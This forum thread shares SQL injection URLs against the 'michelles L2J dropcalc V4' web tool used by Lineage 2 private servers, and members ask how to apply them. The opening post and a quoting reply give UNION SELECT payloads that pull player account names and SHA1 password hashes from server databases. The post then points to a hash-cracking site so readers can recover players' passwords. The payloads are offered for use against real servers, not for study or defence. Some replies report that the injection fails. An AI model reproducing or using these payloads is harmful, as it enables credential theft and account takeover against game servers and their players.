Jump to content

Database Vulnerability


raouf67

Recommended Posts

This concerns only The michelles L2J dropcalc V4

 

SQL Injection: !! You must be logged in, using your own username and Token !!

 

Obtain a player username with sql injection :

 

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

 

!! you must put the token, User and PLAYER without the "[]" !!

 

Obtain a password for that username (encrypted with SHA1) :

 

-- > !! only valid if loginserver and gameserver are in the same machine !!

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

 

Then you have the password encrypted in SHA1  :)

You must decrypt it (don't worry it's easy)

Go Here --> http://md5encryption.com/

 

Now you have the password of the player  ;D

 

 

 

Link to comment
Share on other sites

so on server site there must be implanted "michelles L2J dropcalculator" version 4?

 

what about [Target]/[Path]? by [Token] u mean server token?

 

oh and what about [PLAYER]?

 

ADAL13 u put it in adress at your web browser

Link to comment
Share on other sites

A little bit old as it was reported at the end of January. However you provided a guide "How to" so thanks a lot for sharing.

Could you hide this post so everybody with 100 and more post will be able to see it?

 

What token do you mean? Token which allow you to play on L2 server? The same which you use to run L2Walker?

 

Thanks

 

[EDIT] PLAYER mean character name I suppose.

Link to comment
Share on other sites

@raouf67

 

I tried it on few servers.

Always I am getting "Please give at least 3 characters." so something is wrong with this sql code. I am sure I checked servers where dropcalc is v4.

Can't check if login and game server are on the same machine but I think it is.

"[PLAYER]" means character name in game?

Link to comment
Share on other sites

 

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

 

!! you must put the token, User and PLAYER without the "[]" !!

 

Obtain a password for that username (encrypted with SHA1) :

 

-- > !! only valid if loginserver and gameserver are in the same machine !!

http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

 

Then you have the password encrypted in SHA1  :)

You must decrypt it (don't worry it's easy)

Go Here --> http://md5encryption.com/

 

I have few questions:

1.Token. The same token as for l2 walkers? or from mysql sessions?

2.The michelles L2J dropcalc V4. On what l2 version is this db used c4,c5,interlude?

3.Does this work for anyone?

 

Link to comment
Share on other sites

I have few questions:

1.Token. The same token as for l2 walkers? or from mysql sessions?

2.The michelles L2J dropcalc V4. On what l2 version is this db used c4,c5,interlude?

3.Does this work for anyone?

 

 

1. As raouf67 said "Token doesn't mean server token but session token. When you login in l2j Michelle dropcalc, you have a session token that's it."

2. As far I found C4 and one C5 server which are using l2j dropcalc V4

3. Not working for me as I am getting weird message ""Please give at least 3 characters.""

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...